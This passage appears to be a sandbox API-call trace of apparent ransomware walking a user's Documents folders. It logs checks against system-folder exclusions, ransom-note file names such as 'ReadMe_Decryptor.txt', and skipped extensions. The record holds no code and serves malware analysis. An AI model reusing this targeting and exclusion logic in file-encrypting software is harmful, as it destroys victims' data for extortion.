out: lpFindFileData=0xcce128*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0105.361] lstrcmpW (lpString1="My Shapes", lpString2=".") returned 1 [0105.361] lstrcmpW (lpString1="My Shapes", lpString2="..") returned 1 [0105.361] lstrlenW (lpString="My Shapes") returned 9 [0105.361] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Shapes" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" [0105.361] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="C:\\Windows") returned -1 [0105.361] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.361] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.361] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="C:\\ProgramData") returned 1 [0105.361] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0105.361] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned 1 [0105.361] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned 1 [0105.361] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 1 [0105.362] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.362] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.362] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.362] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0105.362] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="C:\\Intel") returned 1 [0105.362] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="C:\\msys32") returned 1 [0105.362] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="C:\\Qt") returned 1 [0105.362] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="C:\\ProgramData") returned 1 [0105.362] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="C:\\Program Files") returned 1 [0105.362] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="C:\\Windows") returned -1 [0105.362] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="C:\\Program Files (x86)") returned 1 [0105.362] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0105.362] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned 50 [0105.362] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72abb8 [0105.397] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0105.397] FindNextFileW (in: hFindFile=0x72abb8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0105.399] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0105.399] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0105.399] FindNextFileW (in: hFindFile=0x72abb8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0105.399] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0105.399] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0105.399] lstrcmpiW (lpString1="desktop.ini", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.399] lstrcmpiW (lpString1="desktop.ini", lpString2="Decryptor_Info.hta") returned 1 [0105.399] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0105.399] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0105.399] lstrcmpiW (lpString1=".ini", lpString2=".sys") returned -1 [0105.399] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0105.400] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0105.400] lstrcmpiW (lpString1=".ini", lpString2=".msi") returned -1 [0105.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x7af4d0 [0105.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa6) returned 0x7b4dc0 [0105.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af4d0 | out: hHeap=0x6d0000) returned 1 [0105.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b02d8 [0105.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b4dc0 | out: hHeap=0x6d0000) returned 1 [0105.400] FindNextFileW (in: hFindFile=0x72abb8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0105.400] lstrcmpW (lpString1="Favorites.vss", lpString2=".") returned 1 [0105.400] lstrcmpW (lpString1="Favorites.vss", lpString2="..") returned 1 [0105.400] lstrcmpiW (lpString1="Favorites.vss", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.400] lstrcmpiW (lpString1="Favorites.vss", lpString2="Decryptor_Info.hta") returned 1 [0105.400] PathFindExtensionW (pszPath="Favorites.vss") returned=".vss" [0105.400] lstrcmpiW (lpString1=".vss", lpString2=".exe") returned 1 [0105.400] lstrcmpiW (lpString1=".vss", lpString2=".sys") returned 1 [0105.400] lstrcmpiW (lpString1=".vss", lpString2=".lnk") returned 1 [0105.400] lstrcmpiW (lpString1=".vss", lpString2=".dll") returned 1 [0105.400] lstrcmpiW (lpString1=".vss", lpString2=".msi") returned 1 [0105.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x7af4d0 [0105.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa6) returned 0x7b4dc0 [0105.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af4d0 | out: hHeap=0x6d0000) returned 1 [0105.401] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0250 [0105.401] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b4dc0 | out: hHeap=0x6d0000) returned 1 [0105.401] FindNextFileW (in: hFindFile=0x72abb8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0105.401] lstrcmpW (lpString1="_private", lpString2=".") returned 1 [0105.401] lstrcmpW (lpString1="_private", lpString2="..") returned 1 [0105.401] lstrlenW (lpString="_private") returned 8 [0105.401] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpString2="_private" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" [0105.401] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="C:\\Windows") returned -1 [0105.401] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.401] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.401] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="C:\\ProgramData") returned 1 [0105.401] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0105.401] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned 1 [0105.401] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned 1 [0105.401] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 1 [0105.401] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.401] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.401] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.401] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0105.401] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="C:\\Intel") returned 1 [0105.401] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="C:\\msys32") returned 1 [0105.402] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="C:\\Qt") returned 1 [0105.402] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="C:\\ProgramData") returned 1 [0105.402] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="C:\\Program Files") returned 1 [0105.402] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="C:\\Windows") returned -1 [0105.402] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="C:\\Program Files (x86)") returned 1 [0105.402] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0105.402] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned 59 [0105.402] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x7b4fa8 [0105.405] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0105.405] FindNextFileW (in: hFindFile=0x7b4fa8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0105.408] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0105.408] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0105.408] FindNextFileW (in: hFindFile=0x7b4fa8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0105.408] lstrcmpW (lpString1="folder.ico", lpString2=".") returned 1 [0105.408] lstrcmpW (lpString1="folder.ico", lpString2="..") returned 1 [0105.408] lstrcmpiW (lpString1="folder.ico", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.409] lstrcmpiW (lpString1="folder.ico", lpString2="Decryptor_Info.hta") returned 1 [0105.409] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0105.409] lstrcmpiW (lpString1=".ico", lpString2=".exe") returned 1 [0105.409] lstrcmpiW (lpString1=".ico", lpString2=".sys") returned -1 [0105.409] lstrcmpiW (lpString1=".ico", lpString2=".lnk") returned -1 [0105.409] lstrcmpiW (lpString1=".ico", lpString2=".dll") returned 1 [0105.409] lstrcmpiW (lpString1=".ico", lpString2=".msi") returned -1 [0105.409] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0360 [0105.409] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x7b4dc0 [0105.409] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0360 | out: hHeap=0x6d0000) returned 1 [0105.409] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x7af4d0 [0105.409] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b4dc0 | out: hHeap=0x6d0000) returned 1 [0105.409] FindNextFileW (in: hFindFile=0x7b4fa8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 0 [0105.409] FindClose (in: hFindFile=0x7b4fa8 | out: hFindFile=0x7b4fa8) returned 1 [0105.409] FindNextFileW (in: hFindFile=0x72abb8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 0 [0105.410] FindClose (in: hFindFile=0x72abb8 | out: hFindFile=0x72abb8) returned 1 [0105.415] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0105.415] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0105.415] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0105.416] lstrlenW (lpString="My Videos") returned 9 [0105.416] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" [0105.416] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="C:\\Windows") returned -1 [0105.416] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.416] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.416] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="C:\\ProgramData") returned 1 [0105.416] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0105.416] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned 1 [0105.416] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned 1 [0105.416] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 1 [0105.416] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.416] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.416] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.416] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0105.416] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="C:\\Intel") returned 1 [0105.416] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="C:\\msys32") returned 1 [0105.416] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="C:\\Qt") returned 1 [0105.416] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="C:\\ProgramData") returned 1 [0105.417] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="C:\\Program Files") returned 1 [0105.417] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="C:\\Windows") returned -1 [0105.417] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="C:\\Program Files (x86)") returned 1 [0105.417] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\" [0105.417] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned 50 [0105.417] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0xffffffff [0105.417] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0xffffffff [0105.417] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x947d0e80, ftCreationTime.dwHighDateTime=0x1d59688, ftLastAccessTime.dwLowDateTime=0xcd2bc4b0, ftLastAccessTime.dwHighDateTime=0x1d5b7bc, ftLastWriteTime.dwLowDateTime=0xcd2bc4b0, ftLastWriteTime.dwHighDateTime=0x1d5b7bc, nFileSizeHigh=0x0, nFileSizeLow=0xb257, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="o6I2pPx4Jyk.xlsx", cAlternateFileName="O6I2PP~1.XLS")) returned 1 [0105.417] lstrcmpW (lpString1="o6I2pPx4Jyk.xlsx", lpString2=".") returned 1 [0105.417] lstrcmpW (lpString1="o6I2pPx4Jyk.xlsx", lpString2="..") returned 1 [0105.417] lstrcmpiW (lpString1="o6I2pPx4Jyk.xlsx", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.417] lstrcmpiW (lpString1="o6I2pPx4Jyk.xlsx", lpString2="Decryptor_Info.hta") returned 1 [0105.417] PathFindExtensionW (pszPath="o6I2pPx4Jyk.xlsx") returned=".xlsx" [0105.417] lstrcmpiW (lpString1=".xlsx", lpString2=".exe") returned 1 [0105.418] lstrcmpiW (lpString1=".xlsx", lpString2=".sys") returned 1 [0105.418] lstrcmpiW (lpString1=".xlsx", lpString2=".lnk") returned 1 [0105.418] lstrcmpiW (lpString1=".xlsx", lpString2=".dll") returned 1 [0105.418] lstrcmpiW (lpString1=".xlsx", lpString2=".msi") returned 1 [0105.418] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef298 [0105.418] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x7b4dc0 [0105.418] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6d0000) returned 1 [0105.418] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0360 [0105.418] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b4dc0 | out: hHeap=0x6d0000) returned 1 [0105.418] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0105.418] lstrcmpW (lpString1="Outlook Files", lpString2=".") returned 1 [0105.418] lstrcmpW (lpString1="Outlook Files", lpString2="..") returned 1 [0105.418] lstrlenW (lpString="Outlook Files") returned 13 [0105.418] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="Outlook Files" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" [0105.418] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="C:\\Windows") returned -1 [0105.418] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", 